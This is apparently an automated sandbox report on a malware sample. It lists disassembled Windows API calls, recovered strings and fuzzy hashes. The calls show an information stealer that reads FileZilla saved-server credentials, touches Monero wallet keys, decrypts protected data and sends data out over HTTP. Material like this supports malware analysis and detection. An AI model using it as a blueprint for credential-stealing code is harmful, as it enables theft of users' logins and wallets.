                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0064961E
                    • Process32First.KERNEL32(00650ACA,00000128), ref: 00649632
                    • Process32Next.KERNEL32(00650ACA,00000128), ref: 00649647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0064965C
                    • CloseHandle.KERNEL32(00650ACA), ref: 0064967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: /~/$[-c$_-wS$m$n]
                    • API String ID: 0-1439815905
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,00635184,40000001,00000000,00000000,?,00635184), ref: 00648EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,014502E8,00000000,?,00650E10,00000000,?,00000000,00000000), ref: 00647A63
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00647A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,014502E8,00000000,?,00650E10,00000000,?,00000000,00000000,?), ref: 00647A7D
                    • wsprintfA.USER32 ref: 00647AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    APIs
                    • CoCreateInstance.COMBASE(0064E118,00000000,00000001,0064E108,00000000), ref: 00643758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006437B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00639B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00639BA3
                    • LocalFree.KERNEL32(?), ref: 00639BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotect
                    • String ID:
                    • API String ID: 2068576380-0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: w=l|
                    • API String ID: 0-1810114630
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: J[4
                    • API String ID: 0-1610857072
                    • Opcode ID: 788f070fc3865af5fac15fca87e23744f63db86f909b8d1c2bdedbf721865904
                    • Instruction ID: 11a0ad7f217d34c41a4632e2cf1451573b50342de7d0d7a9be6c5279226540d9
                    • Opcode Fuzzy Hash: 788f070fc3865af5fac15fca87e23744f63db86f909b8d1c2bdedbf721865904
                    • Instruction Fuzzy Hash: BE51D2B3E186108FF3086E28DD8677ABBD6EB84310F1B813DDA89D7784E93959044785
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 95636059c972a9d28ca16ea1905b1b81bf04f0521ed442a3ab50f9d211b8abe6
                    • Instruction ID: a67f22e2a699776e26b99938ce946f92fe0eb5d50012783e177ecb6c3c1355cf
                    • Opcode Fuzzy Hash: 95636059c972a9d28ca16ea1905b1b81bf04f0521ed442a3ab50f9d211b8abe6
                    • Instruction Fuzzy Hash: F2516AF3948214ABE3006D3DDC8577BBBDDDB94224F2A0A3DEA94D3B84E97588054292
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3d49c13023c33c229e044aeb6bf844536e6b762c19642c37820d2c31ea9c36b1
                    • Instruction ID: 8bd32fd64687c9556e29c1ffcd0c1dad8ddae747c10aa37bd7bea5d3167f9b5b
                    • Opcode Fuzzy Hash: 3d49c13023c33c229e044aeb6bf844536e6b762c19642c37820d2c31ea9c36b1
                    • Instruction Fuzzy Hash: E751F3F3E142205BE3146D2DDC9576AB6D9EF94320F1B463EEE88D7384E8794C0582D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f02c9d5f957ad4cee424fa35953fd06bf557041d8fa2517885ccc4c02cb33c97
                    • Instruction ID: ae451339fbafa6531efab14896abc5ff036b266b4df58c7ee2d56653b1bb226a
                    • Opcode Fuzzy Hash: f02c9d5f957ad4cee424fa35953fd06bf557041d8fa2517885ccc4c02cb33c97
                    • Instruction Fuzzy Hash: E951CEB251C654DFD301AE19D88577AF7E8EB08360F26493EEAC6D7200E63298009B97
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b5803cdf6fe4204318a681533910139cba8366a20152ae5140ee63986f4be026
                    • Instruction ID: 77090a042eb48fb30e65989621427bf7ed9dee7cca7e167355001e506648d27e
                    • Opcode Fuzzy Hash: b5803cdf6fe4204318a681533910139cba8366a20152ae5140ee63986f4be026
                    • Instruction Fuzzy Hash: 4B4146F3A086005FE359AA28EC4277AB7DADFC4320F1A853DE7C4D3784E979590186C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cc28abd43d05949f6237760fdd9ece1de0abb867a1532be493c3b479799d1fa4
                    • Instruction ID: a3d812efffb9beb98f04dc1a4c4a40c2ef992e920bca95cf946796d61e472312
                    • Opcode Fuzzy Hash: cc28abd43d05949f6237760fdd9ece1de0abb867a1532be493c3b479799d1fa4
                    • Instruction Fuzzy Hash: 7F412AF36082009FF304AA29EC8577BB7EADBD4710F15CA3DE585C7744E63998468652
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 00648DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00648E0B
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                      • Part of subcall function 006399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                      • Part of subcall function 006399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                      • Part of subcall function 006399C0: ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                      • Part of subcall function 006399C0: LocalFree.KERNEL32(0063148F), ref: 00639A90
                      • Part of subcall function 006399C0: CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                      • Part of subcall function 00648E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00648E52
                    • GetProcessHeap.KERNEL32(00000000,000F423F,00650DBA,00650DB7,00650DB6,00650DB3), ref: 00640362
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00640369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00640385
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 00640393
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 006403CF
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 006403DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00640419
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 00640427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00640463
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 00640475
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 00640502
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 0064051A
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 00640532
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 0064054A
                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00640562
                    • lstrcat.KERNEL32(?,profile: null), ref: 00640571
                    • lstrcat.KERNEL32(?,url: ), ref: 00640580
                    • lstrcat.KERNEL32(?,00000000), ref: 00640593
                    • lstrcat.KERNEL32(?,00651678), ref: 006405A2
                    • lstrcat.KERNEL32(?,00000000), ref: 006405B5
                    • lstrcat.KERNEL32(?,0065167C), ref: 006405C4
                    • lstrcat.KERNEL32(?,login: ), ref: 006405D3
                    • lstrcat.KERNEL32(?,00000000), ref: 006405E6
                    • lstrcat.KERNEL32(?,00651688), ref: 006405F5
                    • lstrcat.KERNEL32(?,password: ), ref: 00640604
                    • lstrcat.KERNEL32(?,00000000), ref: 00640617
                    • lstrcat.KERNEL32(?,00651698), ref: 00640626
                    • lstrcat.KERNEL32(?,0065169C), ref: 00640635
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 0064068E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 1942843190-555421843
                    • Opcode ID: 7d6e7b4265c823ca3f5c6c9ef72c4ed871b7cf208a72f0ca48539fdbf377dcd6
                    • Instruction ID: c0ad03641eb3afb201c0b9537d32586046a0490d8b7a65fd7848e8ef1e683a9e
                    • Opcode Fuzzy Hash: 7d6e7b4265c823ca3f5c6c9ef72c4ed871b7cf208a72f0ca48539fdbf377dcd6
                    • Instruction Fuzzy Hash: C8D14E71940108AFEB48EBE0DD9AEEE733AFF54301F44451CF506A6095DE34AA4ACB66
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00634839
                      • Part of subcall function 006347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00634849
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006359F8
                    • StrCmpCA.SHLWAPI(?,014507B0), ref: 00635A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00635B93
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01450630,00000000,?,0144B7F0,00000000,?,00651A1C), ref: 00635E71
                    • lstrlen.KERNEL32(00000000), ref: 00635E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00635E93
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00635E9A
                    • lstrlen.KERNEL32(00000000), ref: 00635EAF
                    • lstrlen.KERNEL32(00000000), ref: 00635ED8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00635EF1
                    • lstrlen.KERNEL32(00000000,?,?), ref: 00635F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00635F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00635F4C
                    • InternetCloseHandle.WININET(00000000), ref: 00635FB0
                    • InternetCloseHandle.WININET(00000000), ref: 00635FBD
                    • HttpOpenRequestA.WININET(00000000,01450760,?,0144FDD8,00000000,00000000,00400100,00000000), ref: 00635BF8
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • InternetCloseHandle.WININET(00000000), ref: 00635FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
